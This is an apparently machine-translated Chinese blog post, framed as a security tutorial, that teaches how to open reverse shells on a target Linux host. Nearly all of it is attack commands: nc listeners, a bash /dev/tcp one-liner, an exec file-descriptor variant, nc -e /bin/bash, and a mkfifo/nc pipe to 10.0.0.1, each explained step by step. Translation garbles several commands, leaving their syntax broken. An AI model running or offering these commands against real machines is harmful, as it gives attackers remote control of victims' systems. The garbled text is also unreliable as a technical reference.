服务器反弹shell,让你的电脑成为傀儡!!
2020-03-19 作者:[db:作者]0x01.bash
在攻击主机上执行端口监视器:
nc -lvvp port //port是攻击主机端口号,并且该端口号未被占用
在目标主机上执行:
bash-I > & amp;/dev/tcp/攻击主机IP/端口0>。&1 //port解释攻击主机端口号
:
bash -i打开一个交互式bash
>。&将标准错误输出重定向到标准输出
/dev/TCP/x.x.x.x/port意味着调用套接字并建立套接字连接,其中x . x . x . x是要跳转到的主机ip,端口是端口
0>。&1标准输入被重定向到标准输出,以实现您与反弹外壳
/dev/tcp/的交互,这是Linux中的一个特殊设备。打开这个文件相当于发出一个套接字调用,建立一个套接字连接,读写这个文件相当于在这个套接字连接中传输数据同样,还有/dev/udp/
其他版本:
exec 5 & lt;>;/dev/TCP/x . x . x . x/9999
cat & lt。&5 |读取行时;做$line 2>。&5 >。&5 .Done
第一个命令与x.x.x:9999建立tcp连接,并将标准输入和输出作为标准输入和输出
第二个cat < & amp5获取设备5的输入;当读取行时;做$line 2>。&5 >。&5一旦获得命令,它将运行,然后将标准输入和输出以及标准误差输出到
< BR >
0x02。设备5中的数控(Netcat)回弹
。端口监视器在攻击主机上执行:
nc -lvvp port //port是攻击主机的端口号。并且此端口号未被占用
在目标主机上执行:
nc -e /bin/bash攻击主机ip端口
还可以执行
Nc x . x . x . x 1234 |/bin/bash | Nc x . x . x . x 4321//打开攻击主机上的两个终端并侦听端口1221在获得回弹壳之后,1234终端输入该命令,并且4321终端在执行相应的命令之后将获得结果
。因为netcat现在可能在许多主机上不可用。因此,如果您在nc -e /bin/bash攻击主机ip端口中遇到不支持-e选项的主机(尽管netcat存在),您也可以通过这种方式来退回shell
rm /tmp/f。MK FIFO/tmp/f;cat /tmp/f|/bin/sh -i 2>。&1|nc 10.0.0.1 1234 >。/tmp/f
RM/tmp/f删除命令
kffo/tmp/f;将fifo文件f
/bin/sh -i 2 >写入tmp目录。&1将标准误差/bin/sh重定向至标准输出
nc x.x.x.x 2333 > /tmp/f将nc监控的输入输入fifo
。你不知道你学到了什么吗?网络世界中的安全漏洞每天都在发生。每个公民都应该了解和学习安全知识和安全意识。任何想学习网络安全技能的小伙伴都可以随时私下信任我。
最新资讯